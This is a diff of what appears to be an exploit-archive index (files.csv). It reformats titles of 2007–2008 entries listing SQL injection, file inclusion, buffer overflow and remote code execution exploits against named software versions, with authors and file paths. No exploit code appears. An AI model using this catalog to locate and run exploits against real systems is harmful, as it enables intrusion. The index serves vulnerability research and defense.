Code Execution Exploit",2007-12-29,irk4z,php,webapps,0 @@ -4504,8 +4504,8 @@ id,file,description,date,author,platform,type,port 4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Remote File Upload / Auth Bypass",2008-01-07,"Eugene Minaev",php,webapps,0 4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 -4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0 -4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0 +4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0 +4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0 4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL/XSS) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0 @@ -4514,12 +4514,12 @@ id,file,description,date,author,platform,type,port 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password Exploit",2008-01-09,Dj7xpl,php,webapps,0 -4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 +4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 -4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 -4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 +4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 +4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Pre-Auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0 @@ -4573,7 +4573,7 @@ id,file,description,date,author,platform,type,port 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - (id) SQL Injection",2008-01-17,Stack,php,webapps,0 4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - (upload.php language) LFI",2008-01-17,Scary-Boys,php,webapps,0 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0 -4932,platforms/windows/remote/4932.html,"Digital Data Communications (RtspVaPgCtrl) Remote BoF Exploit",2008-01-17,rgod,windows,remote,0 +4932,platforms/windows/remote/4932.html,"Digital Data Communications - (RtspVaPgCtrl) Remote BoF Exploit",2008-01-17,rgod,windows,remote,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC BoF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - rtlabel_id2name() Local Null Pointer Dereference DoS",2008-01-18,Hunger,bsd,dos,0 @@ -4588,7 +4588,7 @@ id,file,description,date,author,platform,type,port 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL/fd) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - (MeIpCamX.DLL 1.0.0.4) Remote BoF Exploit",2008-01-20,rgod,windows,remote,0 -4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 +4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 4948,platforms/windows/remote/4948.txt,"Windows RSH daemon 1.8 - Remote Buffer Overflow Exploit",2008-01-21,prdelka,windows,remote,0 4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow Exploit",2008-01-21,prdelka,windows,remote,25 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-21,bazik,php,webapps,0 @@ -4630,7 +4630,7 @@ id,file,description,date,author,platform,type,port 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (fd/XSS) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 -4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 Numerous SQL Injection",2008-01-26,"Charles Hooper",php,webapps,0 +4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Numerous SQL Injection",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0 4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 @@ -4724,7 +4724,7 @@ id,file,description,date,author,platform,type,port 5084,platforms/php/webapps/5084.txt,"Mambo Component com_gallery - SQL Injection",2008-02-08,S@BUN,php,webapps,0 5085,platforms/windows/dos/5085.txt,"jetAudio 7.0.5 - (.ASX) Remote Stack Overflow Exploit PoC",2008-02-08,"laurent gaffié ",windows,dos,0 5086,platforms/windows/dos/5086.html,"ImageStation - (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow PoC",2008-02-08,Trancek,windows,dos,0 -5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit",2008-02-09,rgod,windows,remote,0 +5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow Exploit",2008-02-09,rgod,windows,remote,0 5088,platforms/php/webapps/5088.py,"Limbo CMS 1.0.4.2 - Cuid cookie Blind SQL Injection",2008-02-09,The:Paradox,php,webapps,0 5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 - (index.php page) Local File Inclusion",2008-02-09,Houssamix,php,webapps,0 5090,platforms/php/webapps/5090.pl,"Open-Realty 2.4.3 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 @@ -4788,7 +4788,7 @@ id,file,description,date,author,platform,type,port 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - (articleid) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0 -5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service",2008-02-18,"David Wharton",osx,dos,0 +5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",osx,dos,0 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0 5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow Exploit",2008-02-19,luoluo,windows,remote,0 5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - (artid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 @@ -4886,18 +4886,18 @@ id,file,description,date,author,platform,type,port 5246,platforms/php/webapps/5246.txt,"easycalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143 -5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) post-auth Remote BoF Exploit",2008-03-14,haluznik,windows,remote,0 -5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0 +5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Auth Remote BoF Exploit",2008-03-14,haluznik,windows,remote,0 +5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e - Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Remote Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0 -5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC",2008-03-14,kingcope,solaris,dos,0 -5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 +5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service PoC",2008-03-14,kingcope,solaris,dos,0 +5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Post-Auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 5260,platforms/php/webapps/5260.txt,"fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 -5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 +5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,php,webapps,0 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote BoF Exploit",2008-03-16,h07,windows,remote,0 @@ -4975,7 +4975,7 @@ id,file,description,date,author,platform,type,port 5339,platforms/php/webapps/5339.php,"Nuked-Klan 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 -5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510 +5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Auth Overflow Exploit",2008-04-02,muts,windows,remote,7510 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 @@ -5083,14 +5083,14 @@ id,file,description,date,author,platform,type,port 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 - poll SQL Injection",2008-04-14,S@BUN,php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - (index.php cat_id) SQL Injection",2008-04-15,JosS,php,webapps,0 -5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0Day)",2008-04-15,ryujin,windows,remote,6080 +5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Pre-Auth Remote SEH Overflow Exploit (0Day)",2008-04-15,ryujin,windows,remote,6080 5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - .SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 - .SRT File Buffer Overflow PoC",2008-04-16,j0rgan,windows,dos,0 5456,platforms/asp/webapps/5456.txt,"carbon communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - (id) SQL Injection",2008-04-16,cO2,php,webapps,0 -5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 NSF demuxer Stack Overflow PoC",2008-04-16,"Guido Landi",linux,dos,0 +5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 - NSF demuxer Stack Overflow PoC",2008-04-16,"Guido Landi",linux,dos,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote BoF Exploit (Metasploit)",2008-04-17,oveRet,windows,remote,0 @@ -5104,7 +5104,7 @@ id,file,description,date,author,platform,type,port 5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - (AMG_id) SQL Injection",2008-04-19,Player,php,webapps,0 5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Remote Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0 5471,platforms/php/webapps/5471.txt,"Apartment Search Script - (listtest.php r) SQL Injection",2008-04-19,Crackers_Child,php,webapps,0 -5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 subtitle Buffer Overflow PoC",2008-04-19,grzdyl,windows,dos,0 +5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow PoC",2008-04-19,grzdyl,windows,dos,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe - (detail.php id) SQL Injection",2008-04-19,S@BUN,php,webapps,0 5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - (class) Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0 5475,platforms/asp/webapps/5475.txt,"W1L3D4 Philboard 1.0 - (philboard_reply.asp) SQL Injection",2008-04-20,U238,asp,webapps,0 @@ -5125,12 +5125,12 @@ id,file,description,date,author,platform,type,port 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - (spages.php) Remote Code Execution Exploit",2008-04-23,Inphex,php,webapps,0 5491,platforms/php/webapps/5491.txt,"Joomla Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0 5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 - .SRT File Subtitle Parsing Buffer Overflow Exploit",2008-04-24,lhoang8500,windows,local,0 -5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - SQL Injection (postauth)",2008-04-24,His0k4,php,webapps,0 +5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Post-Auth SQL Injection",2008-04-24,His0k4,php,webapps,0 5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (css/SQL/fpd) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0 5496,platforms/windows/remote/5496.html,"WatchFire Appscan 7.0 - ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0 -5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit",2008-04-25,j0rgan,windows,local,0 +5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow Exploit",2008-04-25,j0rgan,windows,local,0 5499,platforms/php/webapps/5499.txt,"siteman 2.x - (exec/LFI/XSS) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0 5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,php,webapps,0 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 @@ -5210,7 +5210,7 @@ id,file,description,date,author,platform,type,port 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps,0 5582,platforms/php/webapps/5582.txt,"Ktools PhotoStore 3.5.2 - Multiple SQL Injection",2008-05-10,DNX,php,webapps,0 5583,platforms/php/webapps/5583.php,"Joomla Component com_datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0 -5584,platforms/windows/local/5584.c,"Open Office.org 2.31 swriter Local Code Execution Exploit",2008-05-10,Marsu,windows,local,0 +5584,platforms/windows/local/5584.c,"Open Office.org 2.31 - swriter Local Code Execution Exploit",2008-05-10,Marsu,windows,local,0 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow PoC",2008-05-11,"Guido Landi",linux,dos,0 5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion",2008-05-11,CraCkEr,php,webapps,0 5587,platforms/php/webapps/5587.pl,"Joomla Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps,0 @@ -5360,7 +5360,7 @@ id,file,description,date,author,platform,type,port 5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,php,webapps,0 5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution",2008-06-03,JIKO,php,webapps,0 5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0 -5738,platforms/windows/remote/5738.rb,"HP StorageWorks NSI Double Take Remote Overflow Exploit (Metasploit)",2008-06-04,ri0t,windows,remote,1100 +5738,platforms/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow Exploit (Metasploit)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 - (gbid) SQL Injection",2008-06-04,ZAMUT,php,webapps,0 5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 @@ -5371,9 +5371,9 @@ id,file,description,date,author,platform,type,port 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote BoF Exploit",2008-06-05,shinnai,windows,remote,0 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote BoF Exploit (2)",2008-06-05,shinnai,windows,remote,0 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 -5749,platforms/multiple/dos/5749.pl,"Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0 +5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - (BIDIB.ocx) Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 -5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22 +5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post-Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 @@ -5436,7 +5436,7 @@ id,file,description,date,author,platform,type,port 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injection",2008-06-14,"CWH Underground",php,webapps,0 5812,platforms/php/webapps/5812.txt,"PHPMyCart - (shop.php cat) SQL Injection",2008-06-14,anonymous,php,webapps,0 5813,platforms/php/webapps/5813.txt,"Shoutcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 -5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Remote Memory Consumption Exploit (post auth)",2008-06-14,"Praveen Darshanam",linux,dos,0 +5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Post-Auth Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Remote Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow PoC",2008-06-14,t0pP8uZz,windows,dos,0 @@ -5464,9 +5464,9 @@ id,file,description,date,author,platform,type,port 5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) SQL Injection",2008-06-17,anonymous,php,webapps,0 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart - (sLanguage) Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - (index.php page) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 +5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0 -5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 +5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 - Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - (includedir) Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 @@ -5538,7 +5538,7 @@ id,file,description,date,author,platform,type,port 5915,platforms/php/webapps/5915.txt,"Joomla Component com_facileforms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,php,webapps,0 5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - (dir_inc) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 5917,platforms/php/webapps/5917.txt,"tinx CMS 1.1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 -5918,platforms/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service",2008-06-23,Exodus,windows,dos,0 +5918,platforms/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,windows,dos,0 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 - (RFI/LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 @@ -5586,7 +5586,7 @@ id,file,description,date,author,platform,type,port 5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps,0 5966,platforms/php/webapps/5966.pl,"Joomla Component Xe webtv - (id) Blind SQL Injection",2008-06-28,His0k4,php,webapps,0 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injection",2008-06-28,shinmai,php,webapps,0 -5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS",2008-06-30,"Travis Warren",windows,dos,0 +5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Post-Auth IMAP Remote Buffer Overflow DoS",2008-06-30,"Travis Warren",windows,dos,0 5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0 5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 @@ -5630,12 +5630,12 @@ id,file,description,date,author,platform,type,port 6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - (uid) SQL Injection",2008-07-06,"HIva Team",php,webapps,0 